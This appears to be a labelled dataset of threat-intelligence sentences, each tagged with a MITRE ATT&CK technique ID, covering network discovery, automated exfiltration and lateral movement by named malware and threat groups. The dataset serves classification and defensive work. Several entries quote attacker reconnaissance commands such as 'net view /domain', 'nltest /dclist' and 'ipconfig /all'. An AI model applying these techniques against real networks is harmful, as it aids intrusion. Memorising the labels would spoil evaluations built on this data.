{"text1":"Caterpillar WebShell can gather the IP address from the victim's machine using the IP config command.","labels":"['T1016']"}
{"text1":"CharmPower has the ability to use \"ipconfig\" to enumerate system network settings.","labels":"['T1016']"}
{"text1":"Chimera has used ipconfig, Ping, and \"tracert\" to enumerate the IP address and network environment and settings of the local host.","labels":"['T1016']"}
{"text1":"Clambling can enumerate the IP address of a compromised machine.","labels":"['T1016']"}
{"text1":"Cobalt Strike can determine the IP addresses of domain controllers.","labels":"['T1016']"}
{"text1":"Cobalt Strike can determine the NetBios name and  the IP addresses of targets machines including domain controllers.","labels":"['T1016']"}
{"text1":"Comnie uses \"ipconfig \/all\" and \"route PRINT\" to identify network adapter and interface information.","labels":"['T1016']"}
{"text1":"Conti can retrieve the ARP cache from the local system by using the \"GetIpNetTable()\" API call and check to ensure IP addresses it connects to are for local, non-Internet, systems.","labels":"['T1016']"}
{"text1":"CrackMapExec can collect DNS information from the targeted system.","labels":"['T1016']"}
{"text1":"Crimson contains a command to collect the victim MAC address and LAN IP.","labels":"['T1016']"}
{"text1":"Cuba can retrieve the ARP cache from the local system by using \"GetIpNetTable\".","labels":"['T1016']"}
{"text1":"Denis uses \"ipconfig\" to gather the IP address from the system.","labels":"['T1016']"}
{"text1":"Diavol can enumerate victims' local and external IPs when registering with C2.","labels":"['T1016']"}
{"text1":"Dragonfly 2.0 used batch scripts to enumerate network information, including information about trusts, zones, and the domain.","labels":"['T1016']"}
{"text1":"Dragonfly has used batch scripts to enumerate network information, including information about trusts, zones, and the domain.","labels":"['T1016']"}
{"text1":"Dtrack can collect the host's IP addresses using the \"ipconfig\" command.","labels":"['T1016']"}
{"text1":"During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.","labels":"['T1016']"}
{"text1":"During Frankenstein, the threat actors used Empire to find the public IP address of a compromised system.","labels":"['T1016']"}
{"text1":"During FunnyDream, the threat actors used ipconfig for discovery on remote systems.","labels":"['T1016']"}
{"text1":"During Operation CuckooBees, the threat actors used `ipconfig`, `nbtstat`, `tracert`, `route print`, and `cat \/etc\/hosts` commands.","labels":"['T1016']"}
{"text1":"During Operation Wocao, threat actors discovered the local network configuration with `ipconfig`.","labels":"['T1016']"}
{"text1":"Dyre has the ability to identify network settings on a compromised host.","labels":"['T1016']"}
{"text1":"Earth Lusca used the command \"ipconfig\" to obtain information about network configurations.","labels":"['T1016']"}
{"text1":"Elise executes \"ipconfig \/all\" after initial communication is made to the remote server.","labels":"['T1016']"}
{"text1":"Emissary has the capability to execute the command \"ipconfig \/all\".","labels":"['T1016']"}
{"text1":"Empire can acquire network configuration information like DNS servers, public IP, and network proxies used by a host.","labels":"['T1016']"}
{"text1":"Epic uses the \"nbtstat -n\" and \"nbtstat -s\" commands on the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"Explosive has collected the MAC address from the victim's machine.","labels":"['T1016']"}
{"text1":"FELIXROOT collects information about the network including the IP address and DHCP server.","labels":"['T1016']"}
{"text1":"FatDuke can identify the MAC address on the target computer.","labels":"['T1016']"}
{"text1":"Felismus collects the victim LAN IP address and sends it to the C2 server.","labels":"['T1016']"}
{"text1":"Flagpro has been used to execute the \"ipconfig \/all\" command on a victim system.","labels":"['T1016']"}
{"text1":"FunnyDream can parse the `ProxyServer` string in the Registry to discover http proxies.","labels":"['T1016']"}
{"text1":"GALLIUM used \"ipconfig \/all\" to obtain information about the victim network configuration. The group also ran a modified version of NBTscan to identify available NetBIOS name servers.","labels":"['T1016']"}
{"text1":"GeminiDuke collects information on network settings and Internet proxy settings from the victim.","labels":"['T1016']"}
{"text1":"GoldMax retrieved a list of the system's network interface after execution.","labels":"['T1016']"}
{"text1":"Grandoreiro can determine the IP and physical location of the compromised host via IPinfo.","labels":"['T1016']"}
{"text1":"GravityRAT collects the victim IP address, MAC address, as well as the victim account domain name.","labels":"['T1016']"}
{"text1":"GrimAgent can enumerate the IP and domain of a target system.","labels":"['T1016']"}
{"text1":"HotCroissant has the ability to identify the IP address of the compromised machine.","labels":"['T1016']"}
{"text1":"Hydraq creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines.","labels":"['T1016']"}
{"text1":"Industroyer\u2019s 61850 payload component enumerates connected network adapters and their corresponding IP addresses.","labels":"['T1016']"}
{"text1":"Ixeshe enumerates the IP address, network proxy settings, and domain name from a victim's system.","labels":"['T1016']"}
{"text1":"JPIN can obtain network information, including DNS, IP, and proxies.","labels":"['T1016']"}
{"text1":"KEYMARBLE gathers the MAC address of the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"KONNI can collect the IP address from the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"Kazuar gathers information about network adapters.","labels":"['T1016']"}
{"text1":"Kobalos can record the IP address of the target machine.","labels":"['T1016']"}
{"text1":"Kwampirs collects network adapter and interface information by using the commands \"ipconfig \/all\", \"arp -a\" and \"route print\". It also collects the system's MAC address with \"getmac\" and domain configuration with \"net config workstation\".","labels":"['T1016']"}
{"text1":"Lazarus Group malware IndiaIndia obtains and sends to its C2 server information about the first network interface card\u2019s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.","labels":"['T1016']"}
{"text1":"LiteDuke has the ability to discover the proxy configuration of Firefox and\/or Opera.","labels":"['T1016']"}
{"text1":"Lizar can retrieve network information from a compromised host.","labels":"['T1016']"}
{"text1":"Lokibot has the ability to discover the domain name of the infected host.","labels":"['T1016']"}
{"text1":"LoudMiner used a script to gather the IP address of the infected machine before sending to the C2.","labels":"['T1016']"}
{"text1":"Lucifer can collect the IP address of a compromised host.","labels":"['T1016']"}
{"text1":"MacMa can collect IP addresses from a compromised host.","labels":"['T1016']"}
{"text1":"Machete collects the MAC address of the target computer and other network configuration information.","labels":"['T1016']"}
{"text1":"Magic Hound malware gathers the victim's local IP address, MAC address, and external IP address.","labels":"['T1016']"}
{"text1":"Milan can run `C:\\Windows\\system32\\cmd.exe \/c cmd \/c ipconfig \/all 2>&1` to discover network settings.","labels":"['T1016']"}
{"text1":"Mis-Type may create a file containing the results of the command \"cmd.exe \/c ipconfig \/all\".","labels":"['T1016']"}
{"text1":"MoonWind obtains the victim IP address.","labels":"['T1016']"}
{"text1":"More_eggs has the capability to gather the IP address from the victim's machine.","labels":"['T1016']"}
{"text1":"Mosquito uses the \"ipconfig\" command.","labels":"['T1016']"}
{"text1":"NETWIRE can collect the IP address of a compromised host.","labels":"['T1016']"}
{"text1":"NOKKI can gather information on the victim IP address.","labels":"['T1016']"}
{"text1":"Naid collects the domain name from a compromised host.","labels":"['T1016']"}
{"text1":"Naikon uses commands such as \"netsh interface show\" to discover network interface settings.","labels":"['T1016']"}
{"text1":"NanHaiShu can gather information about the victim proxy server.","labels":"['T1016']"}
{"text1":"Neoichor can gather the IP address from an infected host.","labels":"['T1016']"}
{"text1":"OSInfo discovers the current domain information.","labels":"['T1016']"}
{"text1":"OSX_OCEANLOTUS.D can collect the network interface MAC address on the infected host.","labels":"['T1016']"}
{"text1":"OceanSalt can collect the victim\u2019s IP address.","labels":"['T1016']"}
{"text1":"OilRig has run \"ipconfig \/all\" on a victim.","labels":"['T1016']"}
{"text1":"Okrum can collect network information, including the host IP address, DNS, and proxy information.","labels":"['T1016']"}
{"text1":"Olympic Destroyer uses API calls to enumerate the infected system's ARP table.","labels":"['T1016']"}
{"text1":"Operation Wocao has discovered the local network configuration with ipconfig.","labels":"['T1016']"}
{"text1":"Orz can gather victim proxy information.","labels":"['T1016']"}
{"text1":"POWERSTATS can retrieve IP, network adapter configuration information, and domain from compromised hosts.","labels":"['T1016']"}
{"text1":"POWRUNER may collect network configuration data by running \"ipconfig \/all\" on a victim.","labels":"['T1016']"}
{"text1":"Pay2Key can identify the IP and MAC addresses of the compromised host.","labels":"['T1016']"}
{"text1":"PcShare can obtain the proxy settings of a compromised machine using `InternetQueryOptionA` and its IP address by running `nslookup myip.opendns.comresolver1.opendns.com\\r\\n`.","labels":"['T1016']"}
{"text1":"Penquin can report the IP of the compromised host to attacker controlled infrastructure.","labels":"['T1016']"}
{"text1":"PingPull can retrieve the IP address of a compromised host.","labels":"['T1016']"}
{"text1":"PipeMon can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon.","labels":"['T1016']"}
{"text1":"PoshC2 can enumerate network adapter information.","labels":"['T1016']"}
{"text1":"Proxysvc collects the network adapter information and domain\/username information based on current remote sessions.","labels":"['T1016']"}
{"text1":"Pysa can perform network reconnaissance using the Advanced IP Scanner tool.","labels":"['T1016']"}
{"text1":"QUADAGENT gathers the current domain the victim system belongs to.","labels":"['T1016']"}
{"text1":"QakBot can use \"net config workstation\", \"arp -a\", and \"ipconfig \/all\" to gather network configuration information.","labels":"['T1016']"}
{"text1":"RATANKBA gathers the victim\u2019s IP address via the \"ipconfig -all\" command.","labels":"['T1016']"}
{"text1":"Ramsay can use ipconfig and Arp to collect network configuration information, including routing information and ARP tables.","labels":"['T1016']"}
{"text1":"Reaver collects the victim's IP address.","labels":"['T1016']"}
{"text1":"RedLeaves can obtain information about network parameters.","labels":"['T1016']"}
{"text1":"Remsec can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.","labels":"['T1016']"}
{"text1":"Revenge RAT collects the IP address and MAC address from the system.","labels":"['T1016']"}
{"text1":"Rifdoor has the ability to identify the IP address of the compromised host.","labels":"['T1016']"}
{"text1":"Rising Sun can detect network adapter and IP address information.","labels":"['T1016']"}
{"text1":"RogueRobin gathers the IP address and domain from the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"Ryuk has called \"GetIpNetTable\" in attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries.","labels":"['T1016']"}
{"text1":"S-Type has used `ipconfig \/all` on a compromised host.","labels":"['T1016']"}
{"text1":"SDBbot has the ability to determine the domain name and whether a proxy is configured on a compromised host.","labels":"['T1016']"}
{"text1":"SHARPSTATS has the ability to identify the domain of the compromised host.","labels":"['T1016']"}
{"text1":"STARWHALE has the ability to collect the IP address of an infected host.","labels":"['T1016']"}
{"text1":"Sandworm Team checks for connectivity to other resources in the network.","labels":"['T1016']"}
{"text1":"ShadowPad has collected the domain name of the victim system.","labels":"['T1016']"}
{"text1":"Shamoon obtains the target's IP address and local network segment.","labels":"['T1016']"}
{"text1":"Sibot checked if the compromised system is configured to use proxies.","labels":"['T1016']"}
{"text1":"SideCopy has identified the IP address of a compromised host.","labels":"['T1016']"}
{"text1":"SideTwist has the ability to collect the domain name on a compromised host.","labels":"['T1016']"}
{"text1":"Sidewinder has used malware to collect information on network interfaces, including the MAC address.","labels":"['T1016']"}
{"text1":"Small Sieve can obtain the IP address of a victim host.","labels":"['T1016']"}
{"text1":"SoreFang can collect the TCP\/IP, DNS, DHCP, and network adapter configuration on a compromised host via \"ipconfig.exe \/all\".","labels":"['T1016']"}
{"text1":"SpeakUp uses the \"ifconfig -a\" command.","labels":"['T1016']"}
{"text1":"SpicyOmelette can identify the IP of a compromised system.","labels":"['T1016']"}
{"text1":"Squirrelwaffle has collected the victim\u2019s external IP address.","labels":"['T1016']"}
{"text1":"Stealth Falcon malware gathers the Address Resolution Protocol (ARP) table from the victim.","labels":"['T1016']"}
{"text1":"Stuxnet collects the IP address of a compromised system.","labels":"['T1016']"}
{"text1":"Sys10 collects the local IP address of the victim and sends it to the C2.","labels":"['T1016']"}
{"text1":"T9000 gathers and beacons the MAC and IP addresses during installation.","labels":"['T1016']"}
{"text1":"TSCookie has the ability to identify the IP of the infected host.","labels":"['T1016']"}
{"text1":"Taidoor has collected the MAC address of a compromised host; it can also use \"GetAdaptersInfo\" to identify network adapters.","labels":"['T1016']"}
{"text1":"TajMahal has the ability to identify the MAC address on an infected host.","labels":"['T1016']"}
{"text1":"TeamTNT has enumerated the host machine\u2019s IP address.","labels":"['T1016']"}
{"text1":"The IceApple ifconfig module can iterate over all network interfaces on the host and retrieve the name, description, MAC address, DNS suffix, DNS servers, gateways, IPv4 addresses, and subnet masks.","labels":"['T1016']"}
{"text1":"Threat Group-3390 actors use NBTscan to discover vulnerable systems.","labels":"['T1016']"}
{"text1":"Torisma can collect the local MAC address using `GetAdaptersInfo` as well as the system's IP address.","labels":"['T1016']"}
{"text1":"Trojan.Karagany can gather information on the network configuration of a compromised host.","labels":"['T1016']"}
{"text1":"UPPERCUT has the capability to gather the victim's proxy information.","labels":"['T1016']"}
{"text1":"USBferry can detect the infected machine's network topology using \"ipconfig\" and \"arp\".","labels":"['T1016']"}
{"text1":"Unknown Logger can obtain information about the victim's IP address.","labels":"['T1016']"}
{"text1":"VERMIN gathers the local IP address.","labels":"['T1016']"}
{"text1":"Valak has the ability to identify the domain and the MAC and IP addresses of an infected machine.","labels":"['T1016']"}
{"text1":"Volgmer can gather the IP address from the victim's machine.","labels":"['T1016']"}
{"text1":"WannaCry will attempt to determine the local network segment it is a part of.","labels":"['T1016']"}
{"text1":"WellMail can identify the IP address of the victim system.","labels":"['T1016']"}
{"text1":"Wizard Spider has used \"ipconfig\" to identify the network configuration of a victim machine.","labels":"['T1016']"}
{"text1":"ZIRCONIUM has used a tool to enumerate proxy settings in the target environment.","labels":"['T1016']"}
{"text1":"Zebrocy runs the \"ipconfig \/all\" command.","labels":"['T1016']"}
{"text1":"ZeroT gathers the victim's IP address and domain information, and then sends it to its C2 server.","labels":"['T1016']"}
{"text1":"admin@338 actors used the following command after exploiting a machine with LOWBALL malware to acquire information about local networks: \"ipconfig \/all >> %temp%\\download\"","labels":"['T1016']"}
{"text1":"ifconfig can be used to display adapter configuration on Unix systems, including information for TCP\/IP, DNS, and DHCP.","labels":"['T1016']"}
{"text1":"ipconfig can be used to display adapter configuration on Windows systems, including information for TCP\/IP, DNS, and DHCP.","labels":"['T1016']"}
{"text1":"jRAT can gather victim internal and external IPs.","labels":"['T1016']"}
{"text1":"nbtstat can be used to discover local NetBIOS domain names.","labels":"['T1016']"}
{"text1":"route can be used to discover routing configuration information.","labels":"['T1016']"}
{"text1":"xCaon has used the GetAdaptersInfo() API call to get the victim's MAC address.","labels":"['T1016']"}
{"text1":"yty runs \"ipconfig \/all\" and collects the domain name.","labels":"['T1016']"}
{"text1":"zwShell can obtain the victim IP address.","labels":"['T1016']"}
{"text1":"During Operation Wocao, threat actors used a Visual Basic script that checked for internet connectivity.","labels":"['T1016.001']"}
{"text1":"GoldFinder performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.","labels":"['T1016.001']"}
{"text1":"HEXANE has used tools including BITSAdmin to test internet connectivity from compromised hosts.","labels":"['T1016.001']"}
{"text1":"Neoichor can check for Internet connectivity by contacting bing[.]com with the request format `bing[.]com?id=<GetTickCount>`.","labels":"['T1016.001']"}
{"text1":"QakBot can measure the download speed on a targeted host.","labels":"['T1016.001']"}
{"text1":"QuietSieve can check C2 connectivity with a `ping` to 8.8.8.8 (Google public DNS).","labels":"['T1016.001']"}
{"text1":"Rising Sun can test a connection to a specified network IP address over a specified port number.","labels":"['T1016.001']"}
{"text1":"SUGARUSH has checked for internet connectivity from an infected host before attempting to establish a new TCP connection.","labels":"['T1016.001']"}
{"text1":"Turla has used \"tracert\" to check internet connectivity.","labels":"['T1016.001']"}
{"text1":"UNC2452 has used GoldFinder to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through.","labels":"['T1016.001']"}
{"text1":"APT29 has used AdFind to enumerate remote systems.","labels":"['T1018']"}
{"text1":"APT3 has a tool that can detect the existence of remote systems.","labels":"['T1018']"}
{"text1":"APT32 has enumerated DC servers using the command \"net group \"Domain Controllers\" \/domain\". The group has also used the \"ping\" command.","labels":"['T1018']"}
{"text1":"APT39 has used NBTscan and custom tools to discover remote systems.","labels":"['T1018']"}
{"text1":"AdFind has the ability to query Active Directory for computers.","labels":"['T1018']"}
{"text1":"BRONZE BUTLER typically use \"ping\" and Net to enumerate systems.","labels":"['T1018']"}
{"text1":"Backdoor.Oldrea can enumerate and map ICS-specific systems in victim environments.","labels":"['T1018']"}
{"text1":"BitPaymer can use \"net view\" to discover remote systems.","labels":"['T1018']"}
{"text1":"BloodHound can enumerate and collect the properties of domain computers, including domain controllers.","labels":"['T1018']"}
{"text1":"Carbon uses the \"net view\" command.","labels":"['T1018']"}
{"text1":"Chimera has utilized various scans and queries to find domain controllers and remote services in the target environment.","labels":"['T1018']"}
{"text1":"Cobalt Strike uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.","labels":"['T1018']"}
{"text1":"Commands such as \"net view\" can be used in Net to gather information about available remote systems.","labels":"['T1018']"}
{"text1":"Comnie runs the \"net view\" command","labels":"['T1018']"}
{"text1":"Conti has the ability to discover hosts on a target network.","labels":"['T1018']"}
{"text1":"DRATzarus can search for other machines connected to compromised host and attempt to map the network.","labels":"['T1018']"}
{"text1":"Diavol can use the ARP table to find remote hosts to scan.","labels":"['T1018']"}
{"text1":"During C0015, the threat actors used the commands `net view \/all \/domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.","labels":"['T1018']"}
{"text1":"During FunnyDream, the threat actors used several tools and batch files to map victims' internal networks.","labels":"['T1018']"}
{"text1":"During Operation CuckooBees, the threat actors used the `net view` and `ping` commands as part of their advanced reconnaissance.","labels":"['T1018']"}
{"text1":"Earth Lusca used the command \"powershell \u201cGet-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -\nproperty * | findstr \u201cAddress\u201d\u201d\" to find the network information of successfully logged-in accounts to discovery addresses of other machines. Earth Lusca has also used multiple scanning tools to discover other machines within the same compromised network.","labels":"['T1018']"}
{"text1":"Epic uses the \"net view\" command on the victim\u2019s machine.","labels":"['T1018']"}
{"text1":"FIN5 has used the open source tool Essential NetTools to map the network and build a list of targets.","labels":"['T1018']"}
{"text1":"FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.","labels":"['T1018', 'T1046']"}
{"text1":"FIN8 has used dsquery and other Active Directory utilities to enumerate hosts; they have also used \"nltest.exe \/dclist\" to retrieve a list of domain controllers.","labels":"['T1018']"}
{"text1":"Flagpro has been used to execute \"net view\" on a targeted system.","labels":"['T1018']"}
{"text1":"Fox Kitten has used Angry IP Scanner to detect remote systems.","labels":"['T1018']"}
{"text1":"GALLIUM used a modified version of NBTscan to identify available NetBIOS name servers over the network as well as \"ping\" to identify remote systems.","labels":"['T1018']"}
{"text1":"HEXANE has used `net view` to enumerate domain machines.","labels":"['T1018']"}
{"text1":"Indrik Spider has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database.","labels":"['T1018']"}
{"text1":"Industroyer can enumerate remote computers in the compromised network.","labels":"['T1018']"}
{"text1":"Ke3chang has used network scanning and enumeration tools, including Ping.","labels":"['T1018']"}
{"text1":"Kwampirs collects a list of available servers with the command \"net view\".","labels":"['T1018']"}
{"text1":"MURKYTOP has the capability to identify remote hosts on connected networks.","labels":"['T1018']"}
{"text1":"NBTscan can list NetBIOS computer names.","labels":"['T1018']"}
{"text1":"Naikon has used a netbios scanner for remote machine identification.","labels":"['T1018']"}
{"text1":"Nltest may be used to enumerate remote domain controllers using options such as \"\/dclist\" and \"\/dsgetdc\".","labels":"['T1018']"}
{"text1":"OSInfo performs a connection test to discover remote systems in the network","labels":"['T1018']"}
{"text1":"Olympic Destroyer uses Windows Management Instrumentation to enumerate all systems in the network.","labels":"['T1018']"}
{"text1":"Operation Wocao can use the \"ping\" command to discover remote systems.","labels":"['T1018']"}
{"text1":"Ping can be used to identify remote systems within a network.","labels":"['T1018']"}
{"text1":"PoetRAT used Nmap for remote system discovery.","labels":"['T1018']"}
{"text1":"QakBot can identify remote systems through the \"net view\" command.","labels":"['T1018']"}
{"text1":"RATANKBA runs the \"net view \/domain\" and \"net view\" commands.","labels":"['T1018']"}
{"text1":"ROADTools can enumerate Azure AD systems and devices.","labels":"['T1018']"}
{"text1":"SHOTPUT has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.","labels":"['T1018']"}
{"text1":"SILENTTRINITY can enumerate and collect the properties of domain computers.","labels":"['T1018']"}
{"text1":"Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD.","labels":"['T1018']"}
{"text1":"Silence has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts.","labels":"['T1018']"}
{"text1":"SpicyOmelette can identify payment systems, payment gateways, and ATM systems in compromised environments.","labels":"['T1018']"}
{"text1":"Sykipot may use \"net view \/domain\" to display hostnames of available systems on a network.","labels":"['T1018']"}
{"text1":"TRITON\u2019s TsLow python module pings controllers over the TriStation protocol.","labels":"['T1018']"}
{"text1":"The TAINTEDSCRIBE command and execution module can perform target system enumeration.","labels":"['T1018']"}
{"text1":"Threat Group-3390 has used the \"net view\" command.","labels":"['T1018']"}
{"text1":"TrickBot can enumerate computers and network devices.","labels":"['T1018']"}
{"text1":"Turla surveys a system upon check-in to discover remote systems on a local network using the \"net view\" and \"net view \/DOMAIN\" commands. Turla has also used \"net group \"Domain Computers\" \/domain\", \"net group \"Domain Controllers\" \/domain\", and \"net group \"Exchange Servers\" \/domain\" to enumerate domain computers, including the organization's DC and Exchange Server.","labels":"['T1018']"}
{"text1":"WannaCry scans its local network segment for remote systems to try to exploit and copy itself to.","labels":"['T1018']"}
{"text1":"Wizard Spider has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. Wizard Spider has also used AdFind and \"nltest\/dclist\" to enumerate domain computers, including the domain controller.","labels":"['T1018']"}
{"text1":"menuPass uses scripts to enumerate IP ranges on the victim network. menuPass has also issued the command \"net view \/domain\" to a PlugX implant to gather information about remote systems on the network.","labels":"['T1018']"}
{"text1":"njRAT can identify remote hosts on connected networks.","labels":"['T1018']"}
{"text1":"CosmicDuke exfiltrates collected files automatically over FTP to remote servers.","labels":"['T1020']"}
{"text1":"Crutch has automatically exfiltrated stolen files to Dropbox.","labels":"['T1020']"}
{"text1":"Doki has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL.","labels":"['T1020']"}
{"text1":"During Frankenstein, the threat actors collected information via Empire, which was automatically sent back to the adversary's C2.","labels":"['T1020']"}
{"text1":"Ebury can automatically exfiltrate gathered SSH credentials.","labels":"['T1020']"}
{"text1":"Empire has the ability to automatically send collected data back to the threat actors' C2.","labels":"['T1020']"}
{"text1":"Frankenstein has collected information via Empire, which is automatically sent the data back to the adversary's C2.","labels":"['T1020', 'T1041']"}
{"text1":"LightNeuron can be configured to automatically exfiltrate files under a specified directory.","labels":"['T1020']"}
{"text1":"OutSteel can automatically upload collected files to its C2 server.","labels":"['T1020']"}
{"text1":"Peppy has the ability to automatically exfiltrate files and keylogs.","labels":"['T1020']"}
{"text1":"Rover automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. Rover also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.","labels":"['T1020']"}
{"text1":"ShimRatReporter sent collected system and network information compiled into a report to an adversary-controlled C2.","labels":"['T1020']"}
{"text1":"Sidewinder has configured tools to automatically send collected files to attacker controlled servers.","labels":"['T1020']"}
{"text1":"StrongPity can automatically exfiltrate collected documents to the C2 server.","labels":"['T1020']"}
{"text1":"TajMahal has the ability to manage an automated queue of egress files and commands sent to its C2.","labels":"['T1020']"}
{"text1":"MacMa can manage remote screen sessions.","labels":"['T1021']"}
{"text1":"APT29 has used RDP sessions from public-facing systems to internal servers.","labels":"['T1021.001']"}
{"text1":"APT41 used RDP for lateral movement.","labels":"['T1021.001']"}
{"text1":"Axiom has used RDP during operations.","labels":"['T1021.001']"}
{"text1":"Blue Mockingbird has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts.","labels":"['T1021.001']"}
{"text1":"Carbanak enables concurrent Remote Desktop Protocol (RDP) sessions.","labels":"['T1021.001']"}
{"text1":"Chimera has used RDP to access targeted systems.","labels":"['T1021.001']"}
{"text1":"Cobalt Group has used Remote Desktop Protocol to conduct lateral movement.","labels":"['T1021.001']"}
{"text1":"DarkComet can open an active screen of the victim\u2019s machine and take control of the mouse and keyboard.","labels":"['T1021.001']"}
{"text1":"Dragonfly 2.0 moved laterally via RDP.","labels":"['T1021.001']"}
{"text1":"Dragonfly has moved laterally via RDP.","labels":"['T1021.001']"}
{"text1":"FIN6 used RDP to move laterally in victim networks.","labels":"['T1021.001']"}
{"text1":"FIN7 has used RDP to move laterally in victim environments.","labels":"['T1021.001']"}
{"text1":"FIN8 has used RDP for lateral movement.","labels":"['T1021.001']"}
{"text1":"Fox Kitten has used RDP to log in and move laterally in the target environment.","labels":"['T1021.001']"}
{"text1":"Kimsuky has used RDP for direct remote point-and-click access.","labels":"['T1021.001']"}
{"text1":"Leviathan has targeted RDP credentials and used it to move through the victim environment.","labels":"['T1021.001']"}
{"text1":"Magic Hound has used Remote Desktop Services on targeted systems.","labels":"['T1021.001']"}
{"text1":"OilRig has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment.","labels":"['T1021.001']"}
{"text1":"Pupy can enable\/disable RDP connection and can start a remote desktop session using a browser web socket client.","labels":"['T1021.001']"}
{"text1":"QuasarRAT has a module for performing remote desktop access.","labels":"['T1021.001']"}
{"text1":"ServHelper has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel.","labels":"['T1021.001']"}
{"text1":"Silence has used RDP for lateral movement.","labels":"['T1021.001']"}
{"text1":"Stolen Pencil utilized RDP for direct remote point-and-click access.","labels":"['T1021.001']"}
{"text1":"TEMP.Veles utilized RDP throughout an operation.","labels":"['T1021.001']"}
{"text1":"The APT1 group is known to have used RDP during operations.","labels":"['T1021.001']"}
{"text1":"Wizard Spider has used RDP for lateral movement.","labels":"['T1021.001']"}
{"text1":"jRAT can support RDP control.","labels":"['T1021.001']"}
{"text1":"menuPass has used RDP connections to move across the victim network.","labels":"['T1021.001']"}
{"text1":"APT3 will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement.","labels":"['T1021.002']"}
{"text1":"APT41 has transferred implant files using Windows Admin Shares.","labels":"['T1021.002']"}
{"text1":"Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.","labels":"['T1021.002', 'T1053.005', 'T1078']"}
{"text1":"Anchor can support windows execution via SMB shares.","labels":"['T1021.002']"}
{"text1":"BlackEnergy has run a plug-in on a victim to spread through the local network by using PsExec and accessing admin shares.","labels":"['T1021.002']"}
{"text1":"Blue Mockingbird has used Windows Explorer to manually copy malicious files to remote hosts over SMB.","labels":"['T1021.002']"}
{"text1":"Chimera has used Windows admin shares to move laterally.","labels":"['T1021.002']"}
{"text1":"Cobalt Strike can use Window admin shares (C$ and ADMIN$) for lateral movement.","labels":"['T1021.002']"}
{"text1":"Conficker variants spread through NetBIOS share propagation.","labels":"['T1021.002']"}
{"text1":"Conti can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.","labels":"['T1021.002']"}
{"text1":"Deep Panda uses net.exe to connect to network shares using \"net use\" commands with compromised credentials.","labels":"['T1021.002']"}
{"text1":"Diavol can spread throughout a network via SMB prior to encryption.","labels":"['T1021.002']"}
{"text1":"FIN8 has attempted to map to C$ on enumerated hosts to test the scope of their current credentials\/context.","labels":"['T1021.002']"}
{"text1":"HermeticWizard can use a list of hardcoded credentials to to authenticate via NTLMSSP to the SMB shares on remote systems.","labels":"['T1021.002']"}
{"text1":"Lateral movement can be done with Net through \"net use\" commands to connect to the on remote systems.","labels":"['T1021.002']"}
{"text1":"Lazarus Group malware SierraAlfa accesses the \"ADMIN$\" share via SMB to conduct lateral movement.","labels":"['T1021.002']"}
{"text1":"Moses Staff has used batch scripts that can enable SMB on a compromised host.","labels":"['T1021.002']"}
{"text1":"Net Crawler uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.","labels":"['T1021.002']"}
{"text1":"Olympic Destroyer uses PsExec to interact with the \"ADMIN$\" network share to execute commands on remote systems.","labels":"['T1021.002']"}
{"text1":"Operation Wocao has used Impacket's smbexec.py as well as accessing the C$ and IPC$ shares to move laterally.","labels":"['T1021.002']"}
{"text1":"Orangeworm has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS.","labels":"['T1021.002']"}
{"text1":"PsExec, a tool that has been used by adversaries, writes programs to the \"ADMIN$\" network share to execute commands on remote systems.","labels":"['T1021.002']"}
{"text1":"Sandworm Team has run \"net use\" to connect to network shares.","labels":"['T1021.002']"}
{"text1":"Shamoon accesses network share(s), enables share access to the target device, copies an executable payload to the target system, and uses a Scheduled Task\/Job to execute the malware.","labels":"['T1021.002']"}
{"text1":"Stuxnet propagates to available network shares.","labels":"['T1021.002']"}
{"text1":"The Regin malware platform can use Windows admin shares to move laterally.","labels":"['T1021.002']"}
{"text1":"Threat Group-1314 actors mapped network drives using \"net use\".","labels":"['T1021.002']"}
{"text1":"Turla used \"net use\" commands to connect to lateral systems within a network.","labels":"['T1021.002']"}
{"text1":"Wizard Spider has used SMB to drop Cobalt Strike Beacon on a domain controller for lateral movement.","labels":"['T1021.002']"}
{"text1":"Zox has the ability to use SMB for communication.","labels":"['T1021.002']"}
{"text1":"zwShell has been copied over network shares to move laterally.","labels":"['T1021.002']"}
{"text1":"Cobalt Strike can deliver \"beacon\" payloads for lateral movement by leveraging remote COM execution.","labels":"['T1021.003']"}
{"text1":"Cobalt Strike can deliver Beacon payloads for lateral movement by leveraging remote COM execution.","labels":"['T1021.003']"}
{"text1":"SILENTTRINITY can use `System` namespace methods to execute lateral movement using DCOM.","labels":"['T1021.003']"}
